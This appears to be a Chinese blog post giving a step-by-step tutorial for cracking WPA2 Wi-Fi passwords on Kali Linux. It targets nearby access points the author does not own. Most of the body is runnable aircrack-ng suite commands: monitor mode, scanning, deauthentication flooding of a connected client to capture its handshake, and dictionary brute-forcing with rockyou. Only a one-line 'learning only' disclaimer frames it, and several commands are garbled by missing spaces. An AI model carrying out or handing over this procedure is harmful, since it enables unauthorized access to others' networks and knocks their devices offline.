关注我们

破解Wi-Fi硬操作

午夜巴塞罗那午夜巴塞罗那 安全文摘 2020-01-22 16385 0

0x01 过程思路

kali系统接入无线网卡,通过监听周围热点,选择一个Wi-Fi热点,攻击一台连接了该Wi-Fi热点的设备,使它掉线之后这台设备会再次主动连接,用伪装的挂载设备去接收设备发送的tcp三次握手数据包,只要用kali自带的密码字典文件去穷举该数据包,直到找到Wi-Fi密码为止

0x02 详细过程

先将无线网卡插入Kali Linux,输入命令查看,网卡名一般为wlan0

iwconfig

将可能会影响进行无线实验的因素排除掉

service network-manager stop
airmon-ngcheckkill

接着启动monitor模式开启网卡监听

airmon-ngstartwlan0

输入iwconfig命令确认已经进入monitor模式

扫描wifi信号,数据包抓取

airodump-ng wlan0mon

BSSID:AP端MAC地址

PWR:信号强度,数字越⼩小越好

Data:对应路由器的在线数据吞吐量,数字越⼤数据上传量越⼤

CH:对应路由器所在频道

ESSID:对应路由器名称

选择一个WiFi(在此我选择MAC为70:47:E9:64:9A:CF,路由器名为“嘿嘿嘿”)针对某一个WiFi的BSSID进行抓取

airodump-ng -c <AP的频道> -w <抓取握⼿手包的存放位置> --bssid <AP的MAC地址> < monitor名称>

airodump-ngwlan0mon--bssid70:47:E9:64:9A:CF-c11-wwpa2

抓取 ssid 为70:47:E9:64:9A:CF信道为11的wpa2的数据包

现在还抓不到握手包,因为没有客户端与AP进行连接

但是有一个已连接的热点,我们通过新开一个终端窗口,解除认证发送反认证包,让它下线,然后客户端会重新尝试连接热点


aireplay-ng -0 <发送反认证包的个数> -a <BSSID> -c <强制下线的MAC地址> 无线网卡名称

aireplay-ng-010-a70:47:E9:64:9A:CF-c34:F6:4B:AC:E6:F8wlan0mon

系统会下线重新连接,我们就抓到了握手包,我们返回第一个终端就可以看到已经抓到握手包WPA handshake

选择需要破解的数据包和字典(kali自带一个字典文件,虽然不大,也可以通过其他的字典生成工具生成)

解压kali自带的字典文件

路径:/usr/share/wordlists/rockyou.txt.gz

gzip -d/usr/share/wordlists/rockyou.txt.gz

查看一下文件

开始爆破

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa2-10.cap

此文章仅用于学习,不可用于非法用途

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址